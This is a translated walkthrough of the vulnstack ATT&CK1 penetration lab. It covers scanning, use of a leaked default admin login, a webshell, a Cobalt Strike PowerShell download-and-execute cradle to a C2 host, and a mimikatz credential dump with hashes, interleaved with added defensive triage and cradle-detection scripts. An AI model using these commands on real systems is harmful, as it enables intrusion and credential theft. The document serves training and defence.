vulnstack_ATT&CK1 penetration walkthrough

Programming knowledge | Updated: 2023-04-17 10:51:34

I. Target description

The Red Team Practice series builds a set of target ranges modelled on real enterprise environments, to be learned through practice, video tutorials and blog posts together. This exercise is built to simulate the ATT&CK attack chain from start to finish, forming a complete closed loop. A realistic APT practice environment will follow later, so that skills grow out of hands-on work. The environment can reproduce many different attack routes; the author's own route is given below. All virtual machines share one password: 123

I. Environment setup
1. Environment setup and testing
2. Information gathering

II. Vulnerability exploitation
3. Vulnerability search and exploitation
4. Backend Getshell upload techniques
5. System information gathering
6. Host password collection

III. Internal reconnaissance
7. Internal network: continued information gathering
8. Internal attack technique: information disclosure
9. Internal attack technique: MS08-067
10. Internal attack technique: SMB / Remote Desktop password guessing
11. Internal attack technique: Oracle database TNS service vulnerability
12. Internal attack technique: RPC DCOM service vulnerability

IV. Lateral movement
13. Other internal hosts' ports: file read
14. Other internal hosts' ports: redis
15. Other internal hosts' ports: redis Getshell
16. Other internal hosts' ports: MySQL database
17. Other internal hosts' ports: MySQL privilege escalation

V. Building channels
18. Other internal hosts' ports: proxy forwarding

VI. Persistent control
19. Domain penetration: domain member information gathering
20. Domain penetration: weak-password probing of basic services and deeper exploitation with PowerShell
21. Domain penetration: lateral movement [WMI]
22. Domain penetration: C2 command execution
23. Domain penetration: using Domain Fronting to deeply hide the beacon
24. Domain penetration: domain controller compromise and use

VII. Trace cleanup
25. Log cleanup

II. Target information

1. Network topology diagram

2. Network adapter information

Virtual machine   Adapter     IP
Win7              bridge      DHCP
                  hostonly    192.168.52.143
win2008           hostonly    192.168.52.138
win2003           hostonly    192.168.52.141

III. Information gathering

phpstudy on the Win7 machine is already running.

1. Confirming the host

Win7 has one adapter in bridged mode; scan that segment with nmap: nmap 192.168.1.0/24

2. nmap scan

Run a full nmap scan against Win7's external (bridged) adapter:

nmap -A -P0 -p- -sS -T4 192.168.1.23 -oN nmap.A
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap ) at 2022-07-20 14:56 EDT
Nmap scan report for bogon (192.168.1.23)
Host is up (0.00065s latency).
Not shown: 65523 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
|_http-title: 403 Forbidden
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp  open  msrpc        Microsoft Windows RPC
1026/tcp  open  msrpc        Microsoft Windows RPC
1027/tcp  open  msrpc        Microsoft Windows RPC
1028/tcp  open  msrpc        Microsoft Windows RPC
1029/tcp  open  msrpc        Microsoft Windows RPC
1100/tcp  open  msrpc        Microsoft Windows RPC
3306/tcp  open  mysql        MySQL (unauthorized)
57084/tcp open  tcpwrapped
MAC Address: 00:0C:29:03:EE:8B (VMware)
Device type: general purpose|media device
Running: Microsoft Windows 2008|10|7|8.1, Microsoft embedded
OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:03:ee:8b (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: stu1
|   NetBIOS computer name: STU1\x00
|   Domain name: god
|   Forest name: god
|   FQDN: stu1.god
|_  System time: 2022-07-21T02:58:00+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-07-20T18:58:00
|_  start_date: 2022-07-20T08:10:21

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms bogon (192.168.1.23)

OS and Service detection performed. Please report any incorrect results at https://nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.69 seconds

Analysis of the scan results

Port 80 is open, so visit the website.

The 403 appears because the virtual host's document root contains no files, or no index.html, index.php, default.html, etc. (Note that this applies to the document root only; placing them in other directories has no effect.)

Try accessing phpmyadmin.
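As an added example (not part of the original write-up), the following Python script parses nmap's normal (-oN) output of the kind shown above and turns the risky details into remediation items: the TRACE method, the SMB signing settings, the guest SMB session and a MySQL port reachable from the bridged network. The embedded scan excerpt is a constructed, trimmed copy of the output above; the regexes and the wording of the findings are the example's own, not nmap's.

```python
import re
from typing import Dict, List

# Constructed, trimmed copy of the nmap -oN output shown above.
SAMPLE_NMAP = """\
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: 403 Forbidden
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
3306/tcp  open  mysql        MySQL (unauthorized)

Host script results:
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(text: str) -> List[dict]:
    """Extract the port table rows (port, proto, state, service, version)."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                          "service": m.group(4), "version": m.group(5).strip()})
    return ports


def parse_scripts(text: str) -> Dict[str, List[str]]:
    """Group NSE script output by script name: '| name:' (or '|_name: value') opens a
    script, result lines are indented by two or more spaces, '|_' marks the last line.
    Keyed by script name only, not by port."""
    scripts: Dict[str, List[str]] = {}
    current = None
    for line in text.splitlines():
        if not line.startswith("|"):
            current = None
            continue
        raw = line[1:]
        closing = raw.startswith("_")
        if closing:
            raw = raw[1:]
        indent = len(raw) - len(raw.lstrip(" "))
        content = raw.strip()
        if indent <= 1 or current is None:
            name, _, rest = content.partition(":")
            current = name.strip()
            scripts.setdefault(current, [])
            if rest.strip():
                scripts[current].append(rest.strip())
        else:
            scripts[current].append(content)
        if closing:
            current = None
    return scripts


def triage(text: str) -> List[str]:
    """Turn the scan details into remediation items (wording is this example's own)."""
    open_ports = {p["port"] for p in parse_ports(text) if p["state"] == "open"}
    scripts = parse_scripts(text)
    findings = []
    if any("TRACE" in item for item in scripts.get("http-methods", [])):
        findings.append("http: TRACE method enabled (cross-site tracing); set 'TraceEnable off' in Apache")
    for item in scripts.get("smb-security-mode", []):
        if item.startswith("account_used: guest"):
            findings.append("smb: guest/null session accepted; disable guest access")
        if item.startswith("message_signing: disabled"):
            findings.append("smb: SMB1 signing disabled; require signing via Group Policy")
    if any("not required" in item for item in scripts.get("smb2-security-mode", [])):
        findings.append("smb: SMB2 signing not required; enable 'Digitally sign communications (always)'")
    if 3306 in open_ports:
        findings.append("mysql: port 3306 reachable from the network; bind to 127.0.0.1 or firewall it")
    if open_ports & {139, 445}:
        findings.append("smb: file-sharing ports exposed on the bridged interface; filter at the host firewall")
    return findings


if __name__ == "__main__":
    for item in triage(SAMPLE_NMAP):
        print(item)
```

Run it on a real `-oN` file by replacing SAMPLE_NMAP with the file contents; the same parser handles the `smb-os-discovery` and `nbstat` blocks, which is where the domain name and NetBIOS name in the scan above come from.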

 

 

3. Sensitive information scan

nikto -h http://192.168.1.23                   
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.23
+ Target Hostname:    192.168.1.23
+ Target Port:        80
+ Start Time:         2022-07-20 15:40:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/7.3.4
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /phpMyAdmin/: phpMyAdmin directory found
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8724 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2022-07-20 15:41:46 (GMT-4) (78 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.39) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT
      for a Nikto update (or you may email to sullo@cirt) (y/n)? y

+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
- Sent updated info to cirt -- Thank you!
 

phpMyAdmin is present.

4. Sensitive directory scan

dirb http://192.168.1.23/ ~/tools/wordList/web_special_file.txt  

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Aug  2 21:04:40 2021
URL_BASE: http://192.168.1.23/
WORDLIST_FILES: /Users/root/tools/wordList/web_special_file.txt

-----------------

GENERATED WORDS: 7010

---- Scanning URL: http://192.168.1.23/ ----
+ http://192.168.1.23//phpmyadmin/ (CODE:200|SIZE:4378)
+ http://192.168.1.23//beifen.rar (CODE:200|SIZE:3142807)
+ http://192.168.1.23//phpMyAdmin/ (CODE:200|SIZE:4378)
+ http://192.168.1.23//com1 (CODE:403|SIZE:213)
+ http://192.168.1.23//com2 (CODE:403|SIZE:213)
+ http://192.168.1.23//com3 (CODE:403|SIZE:213)
+ http://192.168.1.23//com4 (CODE:403|SIZE:213)
+ http://192.168.1.23//database/% (CODE:400|SIZE:226)
+ http://192.168.1.23//phpmyadmin (CODE:301|SIZE:241)
+ http://192.168.1.23//PhpMyAdmin/ (CODE:200|SIZE:4378)

-----------------
END_TIME: Mon Aug  2 21:04:49 2021
DOWNLOADED: 7010 - FOUND: 10

A sensitive file was found: beifen.rar. Download and extract it:

rar x beifen.rar
ls 
beifen.rar  nmap.A  yxcms
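As an added example (not from the original post), the script below reads nikto and dirb output of the kind shown above and groups the web-exposure items a defender would act on: the exposed phpinfo() page, the phpMyAdmin interfaces and a downloadable backup archive in the web root. The embedded excerpts are constructed, shortened copies of the tool output above; ARCHIVE_EXT and ADMIN_DIRS are the example's own lists.

```python
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

# Constructed, shortened copies of the nikto and dirb output shown above.
SAMPLE_NIKTO = """\
+ Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/7.3.4
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ /phpMyAdmin/: phpMyAdmin directory found
+ /phpmyadmin/: phpMyAdmin directory found
+ 8724 requests: 0 error(s) and 14 item(s) reported on remote host
"""

SAMPLE_DIRB = """\
+ http://192.168.1.23//phpmyadmin/ (CODE:200|SIZE:4378)
+ http://192.168.1.23//beifen.rar (CODE:200|SIZE:3142807)
+ http://192.168.1.23//phpMyAdmin/ (CODE:200|SIZE:4378)
+ http://192.168.1.23//com1 (CODE:403|SIZE:213)
+ http://192.168.1.23//database/% (CODE:400|SIZE:226)
+ http://192.168.1.23//phpmyadmin (CODE:301|SIZE:241)
+ http://192.168.1.23//PhpMyAdmin/ (CODE:200|SIZE:4378)
"""

DIRB_RE = re.compile(r"^\+ (\S+) \(CODE:(\d+)\|SIZE:(\d+)\)$")
NIKTO_PATH_RE = re.compile(r"^\+ (?:OSVDB-\d+: )?(/\S*): (.*)$")
# This example's own lists of what counts as a backup artefact or an admin interface.
ARCHIVE_EXT = (".rar", ".zip", ".7z", ".tar", ".gz", ".bak", ".sql", ".old")
ADMIN_DIRS = ("phpmyadmin", "admin", "manager")


def parse_dirb(text: str) -> List[dict]:
    """Parse '+ URL (CODE:nnn|SIZE:nnn)' lines; collapse the doubled slashes dirb prints."""
    hits = []
    for line in text.splitlines():
        m = DIRB_RE.match(line)
        if m:
            path = re.sub(r"/+", "/", urlparse(m.group(1)).path)
            hits.append({"path": path, "code": int(m.group(2)), "size": int(m.group(3))})
    return hits


def parse_nikto(text: str) -> Tuple[List[dict], List[str]]:
    """Split nikto output into path findings ('+ /path: note') and header/method notes."""
    paths, notes = [], []
    for line in text.splitlines():
        m = NIKTO_PATH_RE.match(line)
        if m:
            paths.append({"path": m.group(1), "note": m.group(2)})
        elif "header is not" in line or "TRACE" in line:
            notes.append(line[2:].strip())
    return paths, notes


def triage(nikto_text: str, dirb_text: str) -> Tuple[Dict[str, Set[str]], List[str]]:
    """Map each exposed path to the reasons it needs attention, plus the server-level notes."""
    findings: Dict[str, Set[str]] = {}

    def add(path: str, why: str) -> None:
        findings.setdefault(path, set()).add(why)

    paths, notes = parse_nikto(nikto_text)
    for p in paths:
        low = p["path"].lower()
        if "phpinfo" in low:
            add(p["path"], "phpinfo() discloses paths, modules and environment; delete the file")
        if any(d in low for d in ADMIN_DIRS):
            add(p["path"], "admin interface reachable without IP restriction or MFA")
    for h in parse_dirb(dirb_text):
        low = h["path"].lower()
        if h["code"] == 200 and low.endswith(ARCHIVE_EXT):
            add(h["path"], f"downloadable archive ({h['size']} bytes): backups must not live in the web root")
        if h["code"] in (200, 301) and any(d in low for d in ADMIN_DIRS):
            add(h["path"], "admin interface reachable without IP restriction or MFA")
    return findings, notes


if __name__ == "__main__":
    found, server_notes = triage(SAMPLE_NIKTO, SAMPLE_DIRB)
    for path, reasons in sorted(found.items()):
        print(path, "->", "; ".join(sorted(reasons)))
    for note in server_notes:
        print("server:", note)
```

The archive check is the one that matters most here: a 3 MB .rar served with HTTP 200 from the document root is exactly how the yxcms source and its default credentials became reachable in this lab.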

Log in to yxcms. The homepage shows the default notice:

This site is the default demo template of YXcms. YXcms is an efficient website management system built on PHP + MySQL. Append /index.php?r=admin to the URL to reach the admin area. Admin username: admin; password: 123456. Change the default password after logging in.

IV. Getshell

Front-end templates - Manage template files - New

Connect with AntSword:

http://192.168.1.23/yxcms/protected/apps/default/view/default/666.php

Check the current privileges.

V. Internal network penetration

1. Cobalt Strike

(1) Start the team server

(2) Create a listener

Cobalt Strike | Listeners | Add. Fill in the relevant fields.

The HTTP listener starts automatically.

(3) Generate the check-in command

Attacks | Web Drive-by | Scripted Web Delivery

Copy the generated command:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.6:80/a'))"

Run this command in AntSword's virtual terminal.
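The check-in command above is a classic PowerShell download cradle (-nop -w hidden plus IEX over WebClient.DownloadString). As an added example that is not part of the original write-up, the script below shows the detection logic a blue team would run over process-creation events (Sysmon event 1 or Windows 4688): it decodes -EncodedCommand payloads, matches the cradle pattern, extracts the URL for blocking, and treats a web-server parent process such as php-cgi.exe as a webshell indicator. The event records are constructed samples in a simplified (image, command line, parent) form; the first one is the command line generated above, and the encoded sample uses the reserved host name example.invalid.

```python
import base64
import binascii
import re
from typing import List, Optional

# Constructed sample of an -EncodedCommand payload (UTF-16LE, base64), built here rather
# than pasted so the sample is known-good; the host name is a reserved example domain.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16le")
).decode("ascii")

# Constructed process-creation events as (image, command line, parent image), the fields a
# Sysmon event 1 or Windows 4688 record carries. The first is the command line generated above.
SAMPLE_EVENTS = [
    ("powershell.exe",
     "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.1.6:80/a'))\"",
     "php-cgi.exe"),
    ("powershell.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1", "explorer.exe"),
    ("powershell.exe", "powershell.exe -NoProfile -EncodedCommand " + _ENCODED, "cmd.exe"),
    ("cmd.exe", "cmd.exe /c dir", "explorer.exe"),
]

HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
NOPROFILE_RE = re.compile(r"(?i)-nop(?:rofile)?\b")
ENCODED_RE = re.compile(r"(?i)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{20,})")
IEX_RE = re.compile(r"(?i)\biex\b|invoke-expression")
DOWNLOAD_RE = re.compile(r"(?i)net\.webclient|downloadstring|downloadfile|invoke-webrequest|invoke-restmethod|\biwr\b|bitstransfer")
URL_RE = re.compile(r"(?i)https?://[^\s'\")]+")
# Parents that should never spawn PowerShell on a web server: a strong webshell indicator.
WEB_SERVER_PARENTS = {"php-cgi.exe", "httpd.exe", "w3wp.exe", "nginx.exe", "tomcat.exe"}


def decode_encoded(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or not valid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(image: str, cmdline: str, parent: str) -> List[str]:
    """Return the reasons an event looks like a download cradle (empty list = nothing found)."""
    reasons: List[str] = []
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    effective = cmdline
    decoded = decode_encoded(cmdline)
    if decoded is not None:
        reasons.append("encoded command (decoded for inspection)")
        effective = cmdline + " " + decoded
    if HIDDEN_RE.search(cmdline):
        reasons.append("hidden window")
    if NOPROFILE_RE.search(cmdline):
        reasons.append("profile suppressed")
    if IEX_RE.search(effective) and DOWNLOAD_RE.search(effective):
        reasons.append("download cradle: remote content passed to Invoke-Expression")
    if parent.lower() in WEB_SERVER_PARENTS:
        reasons.append(f"spawned by web server process {parent} (webshell indicator)")
    return reasons


def is_alert(reasons: List[str]) -> bool:
    """Alert on the cradle or a web-server parent; hidden window and -nop alone are only context."""
    return any(r.startswith(("download cradle", "spawned by web server")) for r in reasons)


def scan(events) -> List[dict]:
    """Run the logic over a batch of events and return alerts with the URLs to block."""
    alerts = []
    for image, cmdline, parent in events:
        reasons = analyze(image, cmdline, parent)
        if is_alert(reasons):
            decoded = decode_encoded(cmdline) or ""
            alerts.append({"cmdline": cmdline, "reasons": reasons,
                           "urls": URL_RE.findall(cmdline + " " + decoded)})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["urls"], "<-", "; ".join(alert["reasons"]))
```

Two design points: the encoded form is decoded before matching, because the same cradle is routinely delivered as -EncodedCommand; and the parent-process check fires on its own, because a PHP worker spawning PowerShell is abnormal regardless of the arguments. PowerShell Script Block Logging (event 4104) would additionally record the downloaded script once IEX runs it.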

 

2. Internal network information gathering

(1) Live host discovery

Beacon 192.168.16.113 | right-click | Explore | Port Scan

 

beacon> portscan 192.168.52.0-192.168.52.255 1-1024,3389,5000-6000 arp 1024
[*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 192.168.52.0-192.168.52.255
[+] host called home, sent: 74813 bytes
[+] received output:
(ARP) Target '192.168.52.143' is alive. 00-0C-29-E0-0A-C7
(ARP) Target '192.168.52.138' is alive. 00-0C-29-F9-1D-F2
(ARP) Target '192.168.52.141' is alive. 00-0C-29-03-3C-CD

[+] received output:
192.168.52.143:139
192.168.52.143:135
192.168.52.143:80

[+] received output:
192.168.52.141:777
192.168.52.141:139
192.168.52.141:135

[+] received output:
192.168.52.141:21 (220 Microsoft FTP Service)

[+] received output:
192.168.52.138:636
192.168.52.138:593

[+] received output:
192.168.52.138:464

[+] received output:
192.168.52.138:389

[+] received output:
192.168.52.138:139
192.168.52.138:135
192.168.52.138:88
192.168.52.138:80

[+] received output:
192.168.52.138:53

[+] received output:
192.168.52.138:445 (platform: 500 version: 6.1 name: OWA domain: GOD)
192.168.52.141:445 (platform: 500 version: 5.2 name: ROOT-TVI862UBEH domain: GOD)
192.168.52.143:445 (platform: 500 version: 6.1 name: STU1 domain: GOD)
Scanner module is complete

View the hosts that are online.


3. Domain information gathering

(1) Hosts in the domain

beacon> net computers
[*] Tasked beacon to run net computers
[+] host called home, sent: 87613 bytes
[+] received output:
Computers:


[+] received output:
 Server Name             IP Address                      
 -----------             ----------                      

[+] received output:
 OWA                     45.56.79.23
 ROOT-TVI862UBEH         192.168.52.141
 STU1                    192.168.52.143
                

4. Host passwords

(1) Dump host passwords

beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 750674 bytes
[+] received output:

Authentication Id : 0 ; 1432192 (00000000:0015da80)
Session           : Interactive from 1
User Name         : Administrator
Domain            : GOD
Logon Server      : OWA
Logon Time        : 2021/8/1 23:26:51
SID               : S-1-5-21-2952760202-1353902439-2381784089-500
    msv :   
     [00000003] Primary
     * Username : Administrator
     * Domain   : GOD
     * LM       : b73a13e9b7832a35aad3b435b51404ee
     * NTLM     : afffeba176210fad4628f0524bfe1942
     * SHA1     : fa83a92197d9896cb41463b7a917528b4009c650
    tspkg : 
     * Username : Administrator
     * Domain   : GOD
     * Password : 123
    wdigest :   
     * Username : Administrator
     * Domain   : GOD
     * Password : 123
    kerberos :  
     * Username : Administrator
     * Domain   : GOD.ORG
     * Password : 123
    ssp :   
    credman :   

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2021/8/1 23:26:39
SID               : S-1-5-19
    msv :   
    tspkg : 
    wdigest :   
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :  
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :   
    credman :   

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : STU1$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2021/8/1 23:26:39
SID               : S-1-5-20
    msv :   
     [00000003] Primary
     * Username : STU1$
     * Domain   : GOD
     * NTLM     : 1d1ef81f6c8874e88bdf1956399e122b
     * SHA1     : 21754c369e3f8186eaf62e730d8c74bd7ba57d89
    tspkg : 
    wdigest :   
     * Username : STU1$
     * Domain   : GOD
     * Password : 88 fa 81 41 40 bb 86 82 6b 34 6e 7e 23 a5 01 48 a5 98 82 aa ce 87 33 c0 01 9b fe 9b 39 4c 1a 4d f2 eb d9 7e 3f f1 f8 42 fa 7c f3 60 6d 10 63 28 25 80 de 4d 8f e8 c5 80 a7 ac f6 99 b4 95 33 0e 96 1f a3 79 b7 0b d1 8f 3a 37 c4 ed 30 c9 cc 4b db 6c db bc 14 79 45 22 b7 73 32 74 2e 99 b8 93 22 15 2e 0d 1f f9 47 3c 81 d2 a4 66 99 b6 23 c4 6a e0 fa 87 12 64 20 bd b1 f3 e2 df c0 71 74 e2 96 d9 8f 03 ee 27 f0 0e 71 86 62 b7 50 f6 f9 eb 4c 3d 33 b0 5d f6 dd 62 7b c8 e0 da 72 f0 f3 49 50 8d e0 9b f3 c2 e9 7a 94 9c 04 e8 f3 3a 23 34 66 df 16 9c 15 fc 25 96 0b 42 65 d6 05 d7 e7 d4 9b c2 aa 02 aa 4a 4d 81 b2 7e 54 51 b1 84 9b 7f 4c 9e d3 26 a4 c7 33 29 2a 0c 4a 70 80 85 1a 1e 79 43 0f ed b8 db 88 68 e6 dd f5 e6 89 a5 a4 c9 
    kerberos :  
     * Username : stu1$
     * Domain   : GOD.ORG
     * Password : 88 fa 81 41 40 bb 86 82 6b 34 6e 7e 23 a5 01 48 a5 98 82 aa ce 87 33 c0 01 9b fe 9b 39 4c 1a 4d f2 eb d9 7e 3f f1 f8 42 fa 7c f3 60 6d 10 63 28 25 80 de 4d 8f e8 c5 80 a7 ac f6 99 b4 95 33 0e 96 1f a3 79 b7 0b d1 8f 3a 37 c4 ed 30 c9 cc 4b db 6c db bc 14 79 45 22 b7 73 32 74 2e 99 b8 93 22 15 2e 0d 1f f9 47 3c 81 d2 a4 66 99 b6 23 c4 6a e0 fa 87 12 64 20 bd b1 f3 e2 df c0 71 74 e2 96 d9 8f 03 ee 27 f0 0e 71 86 62 b7 50 f6 f9 eb 4c 3d 33 b0 5d f6 dd 62 7b c8 e0 da 72 f0 f3 49 50 8d e0 9b f3 c2 e9 7a 94 9c 04 e8 f3 3a 23 34 66 df 16 9c 15 fc 25 96 0b 42 65 d6 05 d7 e7 d4 9b c2 aa 02 aa 4a 4d 81 b2 7e 54 51 b1 84 9b 7f 4c 9e d3 26 a4 c7 33 29 2a 0c 4a 70 80 85 1a 1e 79 43 0f ed b8 db 88 68 e6 dd f5 e6 89 a5 a4 c9 
    ssp :   
    credman :   

Authentication Id : 0 ; 46729 (00000000:0000b689)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2021/8/1 23:26:39
SID               : 
    msv :   
     [00000003] Primary
     * Username : STU1$
     * Domain   : GOD
     * NTLM     : 1d1ef81f6c8874e88bdf1956399e122b
     * SHA1     : 21754c369e3f8186eaf62e730d8c74bd7ba57d89
    tspkg : 
    wdigest :   
    kerberos :  
    ssp :   
    credman :   

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : STU1$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2021/8/1 23:26:39
SID               : S-1-5-18
    msv :   
    tspkg : 
    wdigest :   
     * Username : STU1$
     * Domain   : GOD
     * Password : 88 fa 81 41 40 bb 86 82 6b 34 6e 7e 23 a5 01 48 a5 98 82 aa ce 87 33 c0 01 9b fe 9b 39 4c 1a 4d f2 eb d9 7e 3f f1 f8 42 fa 7c f3 60 6d 10 63 28 25 80 de 4d 8f e8 c5 80 a7 ac f6 99 b4 95 33 0e 96 1f a3 79 b7 0b d1 8f 3a 37 c4 ed 30 c9 cc 4b db 6c db bc 14 79 45 22 b7 73 32 74 2e 99 b8 93 22 15 2e 0d 1f f9 47 3c 81 d2 a4 66 99 b6 23 c4 6a e0 fa 87 12 64 20 bd b1 f3 e2 df c0 71 74 e2 96 d9 8f 03 ee 27 f0 0e 71 86 62 b7 50 f6 f9 eb 4c 3d 33 b0 5d f6 dd 62 7b c8 e0 da 72 f0 f3 49 50 8d e0 9b f3 c2 e9 7a 94 9c 04 e8 f3 3a 23 34 66 df 16 9c 15 fc 25 96 0b 42 65 d6 05 d7 e7 d4 9b c2 aa 02 aa 4a 4d 81 b2 7e 54 51 b1 84 9b 7f 4c 9e d3 26 a4 c7 33 29 2a 0c 4a 70 80 85 1a 1e 79 43 0f ed b8 db 88 68 e6 dd f5 e6 89 a5 a4 c9 
    kerberos :  
     * Username : stu1$
     * Domain   : GOD.ORG
